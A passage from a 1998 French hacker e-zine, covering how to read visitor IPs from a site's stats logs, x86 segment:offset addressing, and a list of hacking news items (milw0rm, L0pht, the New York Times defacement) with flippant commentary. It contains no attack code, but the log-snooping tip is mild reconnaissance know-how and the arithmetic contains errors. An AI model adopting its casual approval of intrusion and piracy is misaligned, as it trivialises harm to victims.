HTTP/1.1" 200 2004
<BR>troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:52 +0100] "GET /ibuton.gif
HTTP/1.1" 200 1113
<BR>troy3-86.abo.wanadoo.fr
<BR>(J'ai raccourci en ne laissant que 2 ou 3 exemples sinon cet E-mag
serait 2 fois plus gros que maintenant)
<BR>Vous obtiendrez ici soit l'IP de la personne soit des infos sur elle.
Comme troy3-86.abo.wanadoo.fr, et si vous avez un tracer d'ip comme WSPINGPR
alors vous aurez l'ip de la personne.
<BR>Mais si on prend un acc&egrave;s prot&eacute;g&eacute;, voil&agrave;
ce que &ccedil;a donne, l'url &eacute;tant: http://www.baguette.com/stats:
le navigateur affiche un &eacute;cran pour login et password.
<BR>J'ai fait annuler et voil&agrave; ce que &ccedil;a a donn&eacute;:

<P>Authorization Required

<P>This server could not verify that you are authorized to access the document
you requested. Either
<BR>you supplied the wrong credentials (e.g., bad password), or your browser
doesn't understand how
<BR>to supply the credentials required.

<P>C'est tout ce que je peux vous dire sur les statistiques d'un site.

<P>&nbsp;&nbsp; - Le registre d'adresses contient 16 bits pour coder&nbsp;
64 ko, soit 65 536 (2^20 (2 exposant 20)
<BR>= 1 048 567). Mais les composants ne permettaient pas d'utiliser compl&egrave;tement
deux registres d'adresse. Du coup, voil&agrave; comment votre ordinateur
calcule une adresse en m&eacute;moire. Il poss&egrave;de quand m&ecirc;me
deux registres d'adresses de 16 bits. L'un correspond au segment, l'autre
&agrave; l'offset. Une adresse est un couple segment/offset. Le calcul
de l'adresse se fait en op&eacute;rant un d&eacute;calage de 4 bits vers
la gauche su registre de segment puis d'une addition binaire avec le registre
offset. Le r&eacute;sultat est sur 20 bits et permet d'adresser 1Mo. Cette
technique, si elle aboutit au r&eacute;sultat voulue, est d'un grand g&acirc;chis.
Beaucoup d'adresses se recouvrent, elles sont accessibles par plusieurs
couples de segment/offset. Ainsi les valeurs (notation segment:offset)
2 :0, 1: 16, 0:32 aboutissent toutes &agrave; la case d'adresse 32.
<BR>&nbsp;
<BR>&nbsp;
<CENTER><FONT SIZE=+1>----- 6&deg;/ Articles divers sur le hacking, les
mesures prises contres, les groupes anti-hackers, etc... (source de diff&eacute;rents
journaux ) -----</FONT></CENTER>

<CENTER>&nbsp;</CENTER>
&nbsp;1) Adaptec a envoy&eacute; un communiqu&eacute; de presse correctif
concernant l'UDF Reader: impossible de lire des CD-RW &agrave; la norme
UDF avec de simples lecteurs multisessions, il faut bien un leceur compatible
CD-RW (ou Multiread). Par contre les CD-R calssiques sur tous les lecteurs
CD multisessions, qu'ils aient &eacute;t&eacute; &eacute;crits en UDF (packet
writing) ou avec des logiciels de gravure classiques. Et dans les faits,
il y a peu d'int&eacute;r&ecirc;t &agrave; utiliser l'UDF sur un CD-R normal
puisque la technique bouffe pr&egrave;s de 200 Mo, le seul&nbsp; avantage
&eacute;tant de sauver sur le CD comme n'importe quelle unit&eacute; de
disque.

<P>&nbsp;2) D'apr&egrave;s le BSA, la France est le pays qui conna&icirc;t
le taux de piratage le plus &eacute;lev&eacute; d'Europe. Il serait parvenu
&agrave; 44 % en 1996. Le BSA ayant un grand coeur, c'est bien connu, souhaiterait
faire baisser ce pourcentage &agrave; un niveau consid&eacute;rable, soit
passer sous le seuil des 27 % d'ici l'an 2001. Toujours d'aprr&egrave;s
la boule de cristal du BSA, cette baisse permettrait de cr&eacute;er 260
000 nouveaux emplois. Mais ont-ils compt&eacute; les pirates qui perdraient
leur boulot?

<P>&nbsp;3) 2 jeunes hackers anglais &acirc;g&eacute;s de 17 et 18 ans,
membres de milw0rm, ont pu acc&eacute;der ill&eacute;galement au syst&egrave;me
informatique du Barc, le centre de recherche de Bhabha responsable des
essais nucl&eacute;aires en Inde, au mois&nbsp; de mai 98 dernier. Les
pirates ont modifi&eacute; la page d'accueuil du site informatique du centre
de recherche et auraient r&eacute;ussi &agrave; voler les courriers &eacute;lectroniques
des savants, avant et apr&egrave;s les essais. D&eacute;samorcer des bombes
par des mail-bombers, fallait y penser!

<P>&nbsp;4) Le pr&eacute;sident du commissariat indien &agrave; l'&eacute;nergie
atomique (AEC) R.Chidambaram, a ni&eacute; que son pays ait &eacute;t&eacute;
victime d'un acte de "piraterie informatique" fin mai, &agrave; l'encontre
du centre de recherche Bhabha (Barc) responsable des essais nuvl&eacute;aires
indiens qui ont bien failli d&eacute;clencher une guerre en Asie du Sud-Est.
"<I>Non c'est absurde. Ils n'ont rien obtenu!</I>", a-t-il d&eacute;clar&eacute;.
Absurde? Pour nous l'absurde, c'est plut&ocirc;t un mec qui d&eacute;pense
des millions de dollars pour faire p&eacute;ter des bombes au lieu de nourrir
un peuple qui cr&egrave;ve de faim.

<P>&nbsp;5) Anastasia, Barbara, Marilyn, Cindy, tant de rencontres sur
le net! Mais attention, la rencontre r&eacute;elle est parfois d&eacute;cevante.
C'est l'histoire d'un Hollandais qui descendait d'un avion dans le New
Hampshire avec un poireau &agrave; la main (vous avez mieux pour vous reconna&icirc;tre?).
Il devait rencontrer un jeune gar&ccedil;on avec lequel il avait convers&eacute;
sur le net. Comme cadeau de bienvenue, il re&ccedil;ut des bracelets aux
poignets. Le jeune ami &eacute;tait en r&eacute;alit&eacute; un agent du
FBI (Mulder est dans le coup!).

<P>&nbsp;6) La police &eacute;gyptienne a arr&ecirc;t&eacute; deux &eacute;tudiants
hackers, pour vol et utilisation frauduleuse de carte bancaire. Les criminels
ont eu toutefois le temps de d&eacute;tourner 147 000 $, soit plus de 900
000 frs, au cours des sept derniers mois pr&eacute;c&eacute;dant leur arrestation.
Les autorit&eacute;s &eacute;gyptiennes assurent qu'il s'agit du premier
crime d'un ressortissant de leur pays sur l'internety. Le plus surprenant
est qu'ils ont d&eacute;pens&eacute; l'int&eacute;gralit&eacute; de ce
montant pour des photos et films pornographiques payant sur le Web! A croire
qu'en Egypte, les filles, elles sont moches...

<P>&nbsp;7) Un collectif de pirates, le Lopht, a affirm&eacute; au S&eacute;nat
am&eacute;ricain en juin 1998 leur capacit&eacute; &agrave; "planter" en
une demi-heure la dorsale de l'internet US. Avec leur ego surdimmensionn&eacute;,
tous ces pirates vont bien finir par motiver les politiques &agrave; une
s&eacute;curisation extr&ecirc;me du net. Et l&agrave; finie la libert&eacute;!

<P>&nbsp;8) Un jeune pirate informatique de 28 ans, Aaron Blosser a d&eacute;tourn&eacute;
plus de 2 500 ordinateurs de la compagnie de t&eacute;l&eacute;phone am&eacute;ricaine
U.S. west (Phoenix, USA) pour tenter de r&eacute;soudre une &eacute;nigme
math&eacute;matique vieille de 350 ans. Il aurait &eacute;galement obtenu
les mots de passe de 15 000 postes de travail de la compagnie, qu'il aurait
publi&eacute;s sur l'internet. L'affaire a &eacute;t&eacute; d&eacute;couverte
lorsqu'il est apparu que les ordinateurs de l'entreprise U.S. West mettaient
5 minutes &agrave; retrouver des num&eacute;ros de t&eacute;l&eacute;phone,
au lieu de 5 secondes en temps normal. Il va s'amuser comme un fous le
gars avec son num&eacute;ro de matricule!

<P>&nbsp;9) Le site du journal le <I>New York Times </I>s'est fait pirat&eacute;,
d&eacute;but seprembre, par un adorateur de Kevin Mitnick. Le hacker a
modifi&eacute; la premi&egrave;re page du site en demandant le lib&eacute;ration
du "condor". Pour lui, il est grand temps d'ouvrir la cage &agrave; l'oiseau
Mitnick!

<P>&nbsp;

<P>Voil&agrave; qui va clore cet E-mag en esp&eacute;rant qu'il vous a
plu! Si vous avez des commentaires &agrave; faire ou des suggestions, &eacute;crivez
&agrave; clad_strife@hotmail.com.

<P>Clad Strife
<DIV ALIGN=right><IMG SRC="bigepee.gif" HEIGHT=189 WIDTH=249></DIV>

</BODY>
</HTML>
